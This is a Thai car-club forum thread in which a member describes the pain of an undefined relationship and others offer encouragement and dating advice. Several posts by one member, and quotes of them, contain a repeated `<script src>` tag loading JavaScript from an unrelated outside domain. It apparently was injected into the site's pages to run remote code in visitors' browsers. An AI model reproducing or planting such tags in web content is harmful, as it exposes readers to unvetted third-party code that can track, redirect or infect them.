ตอบ
wanwisa

ชื่อเล่น: กาป๋องแป้ง

เข้าร่วม: 20 ธันวา 2010
ตอบ: 179

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 250
ให้คำขอบคุณ: 22
อังคาร, 28 ธันวา 2010 21:30 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น

แบบว่า ความรู้สึกมันมากกว่าเพื่อน หรือเราคิดไปเองคนเดียว ไม่หรอกมั๊ง ดูท่าเหมือนเขาก็มีใจ

แต่ก็ไม่รู้ว่าจะทำยังไงต่อไป จะเริ่มจากจุดไหน

ซึ่งบ้างครั้ง เวลาเราถามไป "เป็นคนพิเศษได้ไม๊" แล้วเขาก็่บอกว่า ให้ดูกันไปก่อน

แล้วคำถามคือ เมื่อไหร่?

บางครั้ง คำถามที่เราเคยถามไปแล้วหนึ่งครั้ง เราก็คงไม่กล้าถามซ้ำอีก เหมือนเป็นการเร่งรัดกันเกินไป

เขาบอกว่าให้ดูกัน แสดงว่าเขาก็ชอบฉันใช่ไหม แล้วตอนนี้ล่ะ "ฉันอยู่ในฐานะอะไร" มากกว่าเพื่อน เพื่อนสนิท?

ถ้าเราชอบกัน แล้วทำไมเป็นแฟนกันไม่ได้ หรือเขาตอบฉันเพราะแค่เกรงใจ หรือแค่ให้มันผ่านๆไป

มันเจ็บปวดมากนะ เวลาที่เรา ต้องรอคอยคำตอบที่เราไม่รู้ว่าจะได้รับรู้มันเมื่อไร

มันจะมีจริงหรือ ที่บอกว่า "ฉันจะรอเธอ จนกว่าเธอจะให้คำตอบฉัน"

แล้วต้องรออีกนานไหม? เมื่อไหร่ล่ะ?

1 อาทิตย์? 1 เดือน? หรือ 1 ปี?

แล้วถ้าเราตัดสินใจรอต่อไป แล้ววันนึงเราได้รู้ว่าเธอไม่เคยรักเรา หรือเธอเปลี่ยนใจ

เราจะทำใจรับมันได้หรือ? มีจริงๆหรือที่บอกว่า "ได้แค่ชอบก็พอแล้ว" หรือ "ได้เห็นคนที่เรารักมีความสุขก็พอแล้ว"

ฉันว่า มันก็แค่คำพูดของคนที่เคยผิดหวังแล้วยอมรับความจริงไม่ได้ก็แค่นั้นเอง

มันจึงทำให้เกิดเป็นความ "ไม่มั่นใจ" กับสิ่งที่เรากำลังทำอยู่ ว่า ถูก หรือ ผิด

เมื่อความ "ไม่มั่นใจ" เพิ่มมากขึ้นทุกวัน มันคงจะทำใจลำบากที่จะรอคอย สิ่งที่ไม่รู้ว่าจะได้รับมันเมื่อไหร่

พอเวลาผ่านไป เราเริ่มทำใจได้ และกำลังคิดจะเริ่มต้นใหม่ กับใครสักคน เขาคนนั้นก็กลับเข้ามา ให้ความหวัง

เหมือนถูกดึงกลับไปอยู่วังวนเดิมๆ ให้ความรักกับเขา ทุ่มเทความรักให้ไป แล้วก็

รอคอย รอคอย รอคอย รอ......... คำตอบ

แล้วคำถามเดิมๆก็ย้อนกลับมาอีกครั้ง

ตอนนี้ "เราอยู่ในฐานะอะไร"

เคยไหม?
patoo

ชื่อเล่น: พงษ์

เข้าร่วม: 28 สิงหา 2010
ตอบ: 1273

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5438
ให้คำขอบคุณ: 3559

ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 29 ธันวา 2010 00:05 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
สู้ๆนะครับ อย่าลืมรักตัวเองด้วยละครับ

ได้รับคำขอบคุณจาก: hacker 
Zmart

ชื่อเล่น: มารถ

เข้าร่วม: 05 กันยา 2010
ตอบ: 83

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 143
ให้คำขอบคุณ: 104

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 29 ธันวา 2010 00:49 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
บางที จุดหมายปลายทางก็ไม่ใช่ทุกสิ่ง ลองใส่ใจกับรายละเอียดระหว่างทาง มันก็อาจจะมีความสุขดีกว่ามุ่งหน้าไปสู่จุดหมายอย่างเดียวก็ได้

บางคนก็อาจชอบเดินทางโดยอาจไม่มีจุดหมาย แต่จุดประสงค์คือต้องการรับรู้ เสพ สัมผัส ความสวยงามในการเดินทางซะมากกว่า...
ได้รับคำขอบคุณจาก: cisco  por  KAATO  hacker  nutto2634  max_x  cb3  sayarm  old-dog  ENJOY HONDA 
cisco

ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
พุธ, 29 ธันวา 2010 01:04 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
ไม่ต่างกับผมเลย อารมย์คล้าย ๆ กัน

ตอนนี้คำถามยังอยู่ในใจตลอดเวลาว่า เมื่อไร จะมีวันนั้น
OiShIz

ชื่อเล่น: ไดร์ฟ

เข้าร่วม: 13 พฤศจิกา 2009
ตอบ: 969

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1576
ให้คำขอบคุณ: 2107

สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 29 ธันวา 2010 01:31 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
toshi

เข้าร่วม: 13 พฤศจิกา 2008
ตอบ: 2299

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1405
ให้คำขอบคุณ: 1756

ปี: 2003
พุธ, 29 ธันวา 2010 07:08 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
ผมก็เคยประสบเหตุการณ์ลักษณะนี้มานะ ผมว่าเขาอาจจะชอบคุณนะแต่ไม่ถึงกับมากมายแบบบว่าไม่ใช้สเป็กอะไรประมาณเนี้ย ที่เขายังไม่กล้ารับปากคุณว่าจะคบแบบแฟน เขาอาจจะมีคนที่เขาชอบอยู่แล้วและก็รออีกคนอยู่เหมือนกับคุณที่กำลังรอเขานั้นแหละ เขาอยู่กับคุณได้เพราะคุณดีกับเขา เอาใจใส่เขา โทรหาเขาบ่อย เป็นห่วงเขา ผมว่าเขาก็รู้ว่าคุณคิดยังไงแต่เขาก็ยังคงหาคำตอบให้คุณไม่ได้ ถ้าคุณอยากรูคำตอบจริง ๆ นะ
1.คุณลอง(ทำใจ) พยายามไม่เจอเขาบ่อย
2.โทรหาเขาให้น้อยลง
3.แกล้งทำเป็นไม่สนใจเขาบ้าง (แต่ใจจริงก็สนใจเขาอยู่เหมือนเดิม)
คุณรองเปลี่ยนบทบาท การกระทำของคุณให้เปลี่ยนไปจากเดิมจากที่เคยทำทุกวัน ให้เขาได้รับรู้ถึงพฤติกรรมของคุณที่เปลี่ยนไป ถ้าเขาสนใจในตัวคุณคิดจะคบกับคุณแบบจริงจัง เขาก็จะกลับมาถามและพูดกับคุณเองเมื่อถึงตอนนั้นคุณก็ถามเขาอีกครั้งยื่นคำขาดแบบว่า ถ้าไม่คบเป็นแฟน เราก็ขอเป็นเพื่อนที่ดีต่อกันจะได้สบายใจทั้งคู่... (คุณอาจะได้คำตอบจากสิ่งที่คุณทำก็ได้) ทั้งคุณและเขาจะได้คบกันแบบสบายใจเป็นเพื่อนที่ดีต่อกันและมีโอกาสเปิดรับสิ่งใหม่ ๆ ...เข้ามา....
ลองดูคาบ มันเป็นความคิดส่วนตัวนะคาบ จากประสบการณ์ที่เคยเจอมานานมากแล้ว....บทสรุปสุดท้ายผมบอกได้เลยว่า ต้องทำใจ....สู้ต่อไป ขอให้สมหวังอย่างที่ตั้งใจไว้นะคาบ

แก้ไขล่าสุดโดย เมื่อ พุธ, 29 ธันวา 2010 07:17, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: hacker  nutto2634  sayarm  ENJOY HONDA  Justinaen  SYS  kaisuh  benzd 
por

เข้าร่วม: 01 เมษา 2009
ตอบ: 760

Guru ES
Guru ES

ได้รับคำขอบคุณ: 977
ให้คำขอบคุณ: 913

ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 29 ธันวา 2010 07:13 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
Zmart พิมพ์ว่า:
บางที จุดหมายปลายทางก็ไม่ใช่ทุกสิ่ง ลองใส่ใจกับรายละเอียดระหว่างทาง มันก็อาจจะมีความสุขดีกว่ามุ่งหน้าไปสู่จุดหมายอย่างเดียวก็ได้

บางคนก็อาจชอบเดินทางโดยอาจไม่มีจุดหมาย แต่จุดประสงค์คือต้องการรับรู้ เสพ สัมผัส ความสวยงามในการเดินทางซะมากกว่า...

ลึกซึกจริง ชอบๆ . .
ได้รับคำขอบคุณจาก: hacker  Zmart 
kinikuman

เข้าร่วม: 09 สิงหา 2010
ตอบ: 498

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 702
ให้คำขอบคุณ: 1929

สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 29 ธันวา 2010 07:31 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
por พิมพ์ว่า:

ลึกซึกจริง ชอบๆ . .

ได้รับคำขอบคุณจาก: hacker  Zmart 
toshi

เข้าร่วม: 13 พฤศจิกา 2008
ตอบ: 2299

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1405
ให้คำขอบคุณ: 1756

พุธ, 29 ธันวา 2010 07:35 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น

+1 ...
aeae..

เข้าร่วม: 31 ธันวา 2008
ตอบ: 586

ได้รับคำขอบคุณ: 544
ให้คำขอบคุณ: 557

พุธ, 29 ธันวา 2010 08:32 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
AUM[SilveR]

เข้าร่วม: 14 มกรา 2009
ตอบ: 1151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 776
ให้คำขอบคุณ: 159

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 29 ธันวา 2010 09:09 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
สักวันจะเจอสิ่งที่ใช่นะครับ เอาใจช่วย
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 29 ธันวา 2010 09:15 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
ตัวเลือก ....

คือคำตอบครับ
okuma

ชื่อเล่น: ตู่

เข้าร่วม: 16 กรกฎา 2010
ตอบ: 1962

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1131
ให้คำขอบคุณ: 5404

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 29 ธันวา 2010 09:41 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
wanwisa

พุธ, 29 ธันวา 2010 09:51 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
toshi พิมพ์ว่า:
ผมก็เคยประสบเหตุการณ์ลักษณะนี้มานะ ผมว่าเขาอาจจะชอบคุณนะแต่ไม่ถึงกับมากมายแบบบว่าไม่ใช้สเป็กอะไรประมาณเนี้ย ที่เขายังไม่กล้ารับปากคุณว่าจะคบแบบแฟน เขาอาจจะมีคนที่เขาชอบอยู่แล้วและก็รออีกคนอยู่เหมือนกับคุณที่กำลังรอเขานั้นแหละ เขาอยู่กับคุณได้เพราะคุณดีกับเขา เอาใจใส่เขา โทรหาเขาบ่อย เป็นห่วงเขา ผมว่าเขาก็รู้ว่าคุณคิดยังไงแต่เขาก็ยังคงหาคำตอบให้คุณไม่ได้ ถ้าคุณอยากรูคำตอบจริง ๆ นะ
1.คุณลอง(ทำใจ) พยายามไม่เจอเขาบ่อย
2.โทรหาเขาให้น้อยลง
3.แกล้งทำเป็นไม่สนใจเขาบ้าง (แต่ใจจริงก็สนใจเขาอยู่เหมือนเดิม)
คุณรองเปลี่ยนบทบาท การกระทำของคุณให้เปลี่ยนไปจากเดิมจากที่เคยทำทุกวัน ให้เขาได้รับรู้ถึงพฤติกรรมของคุณที่เปลี่ยนไป ถ้าเขาสนใจในตัวคุณคิดจะคบกับคุณแบบจริงจัง เขาก็จะกลับมาถามและพูดกับคุณเองเมื่อถึงตอนนั้นคุณก็ถามเขาอีกครั้งยื่นคำขาดแบบว่า ถ้าไม่คบเป็นแฟน เราก็ขอเป็นเพื่อนที่ดีต่อกันจะได้สบายใจทั้งคู่... (คุณอาจะได้คำตอบจากสิ่งที่คุณทำก็ได้) ทั้งคุณและเขาจะได้คบกันแบบสบายใจเป็นเพื่อนที่ดีต่อกันและมีโอกาสเปิดรับสิ่งใหม่ ๆ ...เข้ามา....
ลองดูคาบ มันเป็นความคิดส่วนตัวนะคาบ จากประสบการณ์ที่เคยเจอมานานมากแล้ว....บทสรุปสุดท้ายผมบอกได้เลยว่า ต้องทำใจ....สู้ต่อไป ขอให้สมหวังอย่างที่ตั้งใจไว้นะคาบ

คร้า ขอบคุณน๊ะค๊ะ ยังงัยจะลองทำตามดู ถึงแม้มันจะฝืนใจตัวเอง แต่เจ็บครั้งเดียว ดีกว่าเจ็บตลอดไป
wanwisa

พุธ, 29 ธันวา 2010 09:55 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
http://www.youtube.com/watch?v=QfC17HpbYhE
bomtik

เข้าร่วม: 02 เมษา 2009
ตอบ: 772

Guru ES
Guru ES

ได้รับคำขอบคุณ: 497
ให้คำขอบคุณ: 803

พุธ, 29 ธันวา 2010 10:42 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
nonhunterza

ชื่อเล่น: นนท์

เข้าร่วม: 05 พฤศจิกา 2010
ตอบ: 136

ได้รับคำขอบคุณ: 199
ให้คำขอบคุณ: 69

พุธ, 29 ธันวา 2010 10:44 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
สู้ต่อไปครับ

มันอาจต้องใช้เวลาครับ
hacker

พุธ, 29 ธันวา 2010 10:48 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
ท่าทางเจ้าของกระทู้จะอาการหนัก

...
wanwisa

พุธ, 29 ธันวา 2010 11:00 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
hacker พิมพ์ว่า:
ท่าทางเจ้าของกระทู้จะอาการหนัก

...

เหอะๆ หนักใช่ย่อย :(
hacker

พุธ, 29 ธันวา 2010 11:01 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
ต้องขอโทษเพื่อนๆสมาชิก ES ที่เกี่ยวข้องกับเรื่องนี้ด้วยนะครับ

ที่บางคำผมอาจจะพูดแรงไป เพราะถ้าสนิทหรือถามความคิดเห็นผม ผมก็จะตรงๆอย่างงี้แหละครับ

ล่าสุด พี่ๆใน es เพิ่งโดนผมว่าเป็นควายไปอยู่เลย

ผมจะไม่ edit ที่ผมตอบไป ผมขอมาชี้แจงดีกว่า
ผู้ใหญ่บ้าน

เข้าร่วม: 17 กุมภา 2009
ตอบ: 1174

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1071
ให้คำขอบคุณ: 719
พุธ, 29 ธันวา 2010 11:11 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
สาว คนนี้ มา ปั่น กระทู้ความรัก เศร้า จัง

จะร้องไห้ ตาม แล้ว น่ะ
NINJASIAM

ชื่อเล่น: นิน

เข้าร่วม: 06 มกรา 2010
ตอบ: 1621

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2025
ให้คำขอบคุณ: 4537

พุธ, 29 ธันวา 2010 11:38 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
ไม่แน่เวลาที่รอมันอาจจะคุ้มก็ได้น่ะครับ แต่เจอคนที่โอเคกว่าก็เลือกคนนั้นดีกว่าน่ะ (สู้ๆ)

wanwisa

พุธ, 29 ธันวา 2010 11:54 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
A-u-T-o-N-o-m-Y พิมพ์ว่า:
ไม่แน่เวลาที่รอมันอาจจะคุ้มก็ได้น่ะครับ แต่เจอคนที่โอเคกว่าก็เลือกคนนั้นดีกว่าน่ะ (สู้ๆ)

เพราะอะไรเหรอค๊ะ เพราะคนที่เราเลือกเค้า เค้าไม่เลือกเรา ใช่ป่าว
wanwisa

พุธ, 29 ธันวา 2010 12:00 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
ed_36 พิมพ์ว่า:
สาว คนนี้ มา ปั่น กระทู้ความรัก เศร้า จัง

จะร้องไห้ ตาม แล้ว น่ะ

เรื่องความรักมันเป็นเรื่องที่อธิบายยากน๊ะค๊ะ ไม่รู้จักจบจักสิ้น เหอะๆ
idris

ชื่อเล่น: ลิตย์

เข้าร่วม: 12 มีนา 2009
ตอบ: 575

ได้รับคำขอบคุณ: 1729
ให้คำขอบคุณ: 710

พุธ, 29 ธันวา 2010 12:13 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
wanwisa พิมพ์ว่า:

อย่างที่บอกครับ ความรักมันบังคับกันไม่ด้ายยยยย....เรื่องอย่างนี้มันไม่มี.คนถูกคนผิด.หรอกครับ..คนเราอะชอบ*หลง*ใคร่*ใครก็ใด้ตั้งมากมาก..(กิ๊ก).แต่จะ*รัก*ใด้แค่คนเดียว.....ให้ใด้แค่เพื่อนจิงๆครับ......T T.....

เพราะอะไรเหรอค๊ะ เพราะคนที่เราเลือกเค้า เค้าไม่เลือกเรา ใช่ป่าว
wanwisa

พุธ, 29 ธันวา 2010 12:19 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
idris พิมพ์ว่า:

อย่างที่บอกครับ ความรักมันบังคับกันไม่ด้ายยยยย....เรื่องอย่างนี้มันไม่มี.คนถูกคนผิด.หรอกครับ..คนเราอะชอบ*หลง*ใคร่*ใครก็ใด้ตั้งมากมาก..(กิ๊ก).แต่จะ*รัก*ใด้แค่คนเดียว.....ให้ใด้แค่เพื่อนจิงๆครับ......T T.....

อ่าห่า เหอะๆ
NINJASIAM

ครอบครัว ES
ครอบครัว ES

พุธ, 29 ธันวา 2010 12:22 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น

อาจจะไม่ใช่หรอกครับ อาจไม่ใช่ไม่เลือก บางครั้งมันก็ต้องใช้เวลาการที่คนๆหนึ่งจะตัดสินใจคบกับใครซักคน

แสดงว่าเค้าอาจจะอยากคบจริงๆก็ได้ มองในทางกลับกันถ้าเกิดเค้าคนนั้นไม่คิดเลย ถ้ามาตอบได้ทันทีว่า "รัก"

หรือ เราคบกันก็ได้ ทั้งๆที่ยังไม่รู้จักกันดีพอ เค้าตอบเพื่ออะไร หวังอะไรจากตัวเราหรือเปล่า

อันนี้ความคิดเห็นส่วนตัวน่ะครับ (นานาจิตตัง) คนเราคิดไม่เหมือนกันเนอะ ยังไงก็ขอให้โชคดีน่ะ

ทำอะไรก็คิดๆดี ถ้าคิดไม่ดีเดี๋ยวจะมาเสียใจกับการกระทำนั้นทีหลัง ว่าทำไมตอนนั้นไม่ทันแบบนั้นตอนนั้นไม่ทำแบบนี้

ถ้ามันจะผิดพลาด อย่างน้อยเราก็จะได้รู้ว่าเราทำดีที่สุดแล้ว

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: ENJOY HONDA 
wanwisa

พุธ, 29 ธันวา 2010 12:26 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น

อาจจะไม่ใช่หรอกครับ อาจไม่ใช่ไม่เลือก บางครั้งมันก็ต้องใช้เวลาการที่คนๆหนึ่งจะตัดสินใจคบกับใครซักคน

แสดงว่าเค้าอาจจะอยากคบจริงๆก็ได้ มองในทางกลับกันถ้าเกิดเค้าคนนั้นไม่คิดเลย ถ้ามาตอบได้ทันทีว่า "รัก"

หรือ เราคบกันก็ได้ ทั้งๆที่ยังไม่รู้จักกันดีพอ เค้าตอบเพื่ออะไร หวังอะไรจากตัวเราหรือเปล่า

อันนี้ความคิดเห็นส่วนตัวน่ะครับ (นานาจิตตัง) คนเราคิดไม่เหมือนกันเนอะ ยังไงก็ขอให้โชคดีน่ะ

ทำอะไรก็คิดๆดี ถ้าคิดไม่ดีเดี๋ยวจะมาเสียใจกับการกระทำนั้นทีหลัง ว่าทำไมตอนนั้นไม่ทันแบบนั้นตอนนั้นไม่ทำแบบนี้

ถ้ามันจะผิดพลาด อย่างน้อยเราก็จะได้รู้ว่าเราทำดีที่สุดแล้ว

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">

อย่างงั้นเหรอค๊ะ คือสรุบว่า ถ้าใช่ก็คือใช่ อะไรประมาณนั้นเหรอป่าวค๊ะ คุนนิน
ได้รับคำขอบคุณจาก: A-u-T-o-N-o-m-Y 
NINJASIAM

ครอบครัว ES
ครอบครัว ES

พุธ, 29 ธันวา 2010 12:32 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
เอ๊อันนี้มันก็แล้วแต่คนเราจะคิดแหละน๊านู๋แป้ง คนเรามันคิดไม่เหมือนกันนี่เนอะ eiieii

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
wanwisa

พุธ, 29 ธันวา 2010 12:37 - เคยไหม บางทีบางครั้ง เรารู้สึกเหมือน เราไม่รู้ว่า เราอยู่ในฐานะอะไร กับเขาคนนั้น
เอ๊อันนี้มันก็แล้วแต่คนเราจะคิดแหละน๊านู๋แป้ง eiieii

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">

ถ้ารู้ความคิดของคนจังน๊ะค๊ะ สมมุติว่า ถ้าเหตุการณ์แบบนี้เกิดขึ้นจะคุนนิน นินจะทำอย่างไรเอ่ย (ในความคิดของคุนอ่ะค๊ะ)
ตอบ
หน้า 1 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.